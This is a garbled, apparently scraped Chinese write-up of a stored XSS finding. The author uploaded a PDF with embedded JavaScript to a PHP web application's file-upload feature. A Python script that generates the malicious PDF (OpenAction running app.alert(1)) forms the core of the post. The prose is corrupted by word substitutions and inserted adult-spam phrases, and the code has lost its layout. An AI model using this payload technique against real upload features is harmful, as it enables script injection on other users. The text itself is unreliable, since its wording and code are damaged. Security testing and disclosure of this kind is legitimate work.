在测试Web讹诈本事时色色王国，发现有在文献上传功能。

女同视频

尝试上传多样类型的文献，包括PHP文献，因为后端是用PHP编写的。晦气的是，王人莫得生效。

不外，我也曾生效上传了一个PDF文献。意志到这少量，我进行了一些在线计议，发现不错将JavaScript代码注入PDF文献。

是以我需要在PDF文献中注入代码，若是网站莫得作念必要的检查，咱们就有了一个存储型的XSS间隙。我在网上找不到一个绵薄的XSS PDF。是以我决定编写一个Python剧本。此Python剧本将一个JavaScript代码镶嵌到PDF中，在本例中为 app.alert(1) 。

底下是Python代码：

#<https://github.com/kaanatmacaa>importsysifsys.version_info[0] <3:    raiseSystemExit('Use Python 3 (or higher) only')importioimportbz2importbase64defcreate_malpdf1(filename):    withopen(filename，'w')asfile:        file.write('''%PDF-1.7        1 0 obj        <</Pages 1 0 R /OpenAction 2 0 R>>        2 0 obj        <</S /JavaScript /JS (app.alert(1))        >> trailer <</Root 1 0 R>>''')if__name__ =='__main__':    print('Creating PDF files..')    create_malpdf1('test.pdf')    print('Done!')

创建PDF文献后，我将其上传到Web讹诈本事，然后BOOM. 存储XSS生效触发了。

图片

总之色色王国，用户和企业时常不会预念念到PDF文档中的坏心剧本。诞生东谈主员应在其讹诈本事中对PDF文献履行必要的安全检查。此外，若是讹诈集成了第三方PDF文献阅读器，应及时更新这些组件。

本站仅提供存储干事，悉数本色均由用户发布，如发现无益或侵权本色，请点击举报。